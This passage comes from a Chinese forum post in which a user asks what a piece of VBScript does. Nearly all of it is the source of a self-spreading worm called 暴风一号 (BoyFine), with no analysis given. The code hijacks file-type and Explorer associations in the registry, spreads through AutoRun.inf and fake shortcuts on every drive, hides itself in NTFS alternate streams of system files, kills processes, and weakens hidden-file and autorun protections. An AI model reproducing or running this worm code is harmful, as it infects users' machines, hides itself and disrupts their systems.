CopyFile(HostSourcePath, HostFilePath):Call SetHiddenAttr(HostFilePath):End If:End If
If ReadReg(HCULoad)<>Load_Value Then:Call WriteReg (HCULoad, Load_Value, ""):End If:If GetVersion() < Version Then:Call WriteReg (HCUVer, Version, ""):End If:If GetInfectedDate() = "" Then:Call WriteReg (HCUDate, Date, ""):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value Then:Call SetTxtFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value Then:Call SetIniFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value Then:Call SetInfFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value Then:Call SetBatFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value Then:Call SetCmdFileAss(VirusAssPath):End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value Then:Call SetRegFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value Then:Call SetchmFileAss(VirusAssPath):End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value Then:Call SethlpFileAss(VirusAssPath):End If:If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value Then:Call SetIEAss(VirusAssPath):End If:If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value Then:Call SetIEAss(VirusAssPath):End If:If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 Then:Call SetMyComputerAss(VirusAssPath):End If:If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 Then:Call SetMyComputerAss(VirusAssPath):End If:Call RegSet()
End Sub
Sub CopyFile(source, pathf):On Error Resume Next:If FSO.FileExists(pathf) Then:FSO.DeleteFile pathf , True:End If:FSO.CopyFile source, pathf:End Sub:Sub CreateFile(code, pathf):On Error Resume Next:Dim FileText:If FSO.FileExists(pathf) Then:Set FileText=FSO.OpenTextFile(pathf, 2, False):FileText.Write code:FileText.Close:Else:Set FileText=FSO.OpenTextFile(pathf, 2, True):FileText.Write code:FileText.Close:End If:End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
On Error Resume Next:Set WMIService=GetObject("winmgmts:\\.\root\cimv2"):For Each ProcessName in ProcessNames :Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' "):For Each Process in ProcessList:IntReturn=Process.terminate:If intReturn<>0 Then:WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False:End If:Next:Next
End Sub
Sub KillImmunity(D):On Error Resume Next:ImmunityFolder=D&":\Autorun.inf":If Fso.FolderExists(ImmunityFolder) Then:WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True:WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True:End If:End Sub:Sub KeepProcess(VBSFullNames):On Error Resume Next:For Each VBSFullName in VBSFullNames :If VBSProcessCount(VBSFullName) < 2 then:Run("%SystemRoot%\system\svchost.exe "&VBSFullName):End If:Next:End Sub
Function GetSystemDrive():GetSystemDrive=Left(Fso.GetSpecialFolder(0),2):End Function
Function GetFileSystemType(Drive):Set d=FSO.GetDrive(Drive):GetFileSystemType=d.FileSystem:End Function
Function ReadReg(strkey):Dim tmps:Set tmps=CreateObject("WScript.Shell"):ReadReg=tmps.RegRead(strkey):Set tmps=Nothing:End Function
Sub WriteReg(strkey, Value, vtype):Dim tmps:Set tmps=CreateObject("WScript.Shell"):If vtype="" Then:tmps.RegWrite strkey, Value:Else:tmps.RegWrite strkey, Value, vtype:End If:Set tmps=Nothing:End Sub:Sub DeleteReg(strkey):Dim tmps:Set tmps=CreateObject("WScript.Shell"):tmps.RegDelete strkey:Set tmps=Nothing:End Sub:Sub SetHiddenAttr(path):On Error Resume Next:Dim vf:Set vf=FSO.GetFile(path):Set vf=FSO.GetFolder(path):vf.Attributes=6:End Sub
Sub Run(ExeFullName):On Error Resume Next:Dim WshShell:Set WshShell=WScript.CreateObject("WScript.Shell"):WshShell.Run ExeFullName:Set WshShell=Nothing:End Sub:Sub InfectRoot(D,VirusName):On Error Resume Next:Dim VBSCode:VBSCode=GetCode(WScript.ScriptFullName):VBSPath=D&":\"&VirusName:If FSO.FileExists(VBSPath)=False Then:Call CreateFile(VBSCode, VBSPath):Call SetHiddenAttr(VBSPath):End If:Set Folder=Fso.GetFolder(D&":\"):Set SubFolders=Folder.Subfolders:For Each SubFolder In SubFolders:SetHiddenAttr(SubFolder.Path):LnkPath=D&":\"&SubFolder.Name&".lnk":TargetPath=D&":\"&VirusName:Args=""""&D&":\"&SubFolder.Name& "\Dir""":If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then:If Fso.FileExists(LnkPath)=True Then:FSO.DeleteFile LnkPath, True:End If:Call CreateShortcut(LnkPath,TargetPath,Args):End If:Next:End Sub
Sub CreateShortcut(LnkPath,TargetPath,Args):Set Shortcut=WshShell.CreateShortcut(LnkPath):with Shortcut:.TargetPath=TargetPath:.Arguments=Args:.WindowStyle=4:.IconLocation="%SystemRoot%\System32\Shell32.dll, 3":.Save:end with:End Sub
Sub CreateAutoRun(D,VirusName):On Error Resume Next:Dim InfPath, VBSPath, VBSCode:InfPath=D&":\AutoRun.inf":VBSPath=D&":\"&VirusName:VBSCode=GetCode(WScript.ScriptFullName):If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then:Call CreateFile(VBSCode, VBSPath):Call SetHiddenAttr(VBSPath):StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open=打开(&O)"&VBCRLF&"shell\open\command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell\open\Default=1"& VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun""":Call KillImmunity(D):Call CreateFile(StrInf, InfPath):Call SetHiddenAttr(InfPath):End If:End Sub
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIniFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetInfFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetBatFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetCmdFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetIEAss(sFilePath)
On Error Resume Next
Dim Value
Value="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetMyComputerAss(sFilePath)
On Error Resume Next
Dim Value1,Value2
Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "
Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub
Function GetSerialNumber(Drv)
On Error Resume Next
Set d=fso.GetDrive(Drv)
GetSerialNumber=d.SerialNumber
GetSerialNumber=Replace(GetSerialNumber,"-","")
End Function
Function GetMainVirus(N)
On Error Resume Next
MainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"
If GetFileSystemType(GetSystemDrive())="NTFS" Then
If N=1 Then
GetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName
End If
If N=0 Then
GetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName
End If
Else
GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName
End If
End Function
Function VBSProcessCount(VBSPath)
On Error Resume Next
Dim WMIService, ProcessList, Process
VBSProcessCount=0
Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process in ProcessList
If InStr(Process.CommandLine, VBSPath)>0 Then
VBSProcessCount=VBSProcessCount+1
End If
Next
End Function
Function PreDblInstance()
On Error Resume Next
PreDblInstance=False
If VBSProcessCount(WScript.ScriptFullName)>= 3 Then
PreDblInstance=True
End If
End Function
Function GetTargetPath(LnkPath)
On Error Resume Next
Dim Shortcut
Set Shortcut=WshShell.CreateShortcut(LnkPath)
GetTargetPath=Shortcut.TargetPath
End Function
Function GetCode(FullPath)
On Error Resume Next
Dim FileText
Set FileText=FSO.OpenTextFile(FullPath, 1)
GetCode=FileText.ReadAll
FileText.Close
End Function
Function GetVersion()
Dim VerInfo
VerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
If ReadReg(VerInfo)="" Then
GetVersion=0
Else
GetVersion=CInt(ReadReg(VerInfo))
End If
End Function
Sub VirusAlert()
On Error Resume Next
Dim HtaPath,HtaCode
HtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"
HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号</font>"&VBCRLF&"</DIV></BODY></HTML>"
If FSO.FileExists(HtaPath)=False Then
Call CreateFile(HtaCode, HtaPath)
Call SetHiddenAttr(HtaPath)
End If
Call Run(HtaPath)
End Sub
Function GetInfectedDate()
On Error Resume Next
Dim DateInfo
DateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
If ReadReg(DateInfo)="" Then
GetInfectedDate=""
Else
GetInfectedDate=CDate(ReadReg(DateInfo))
End If
End Function
Sub MakeJoke(Times)
On Error Resume Next
Dim WMP, colCDROMs
Set WMP = CreateObject( "WMPlayer.OCX" )
Set colCDROMs = WMP.cdromCollection
If colCDROMs.Count >0 Then
For i=1 to Times
colCDROMs.Item(0).eject()
WScript.Sleep 3000
colCDROMs.Item(0).eject()
Next
End If
Set WMP = Nothing
End Sub

复制代码

作者: 8913845 发布时间: 2010-06-26

请教一段VBScript代码是什么意思

热门阅读

热门下载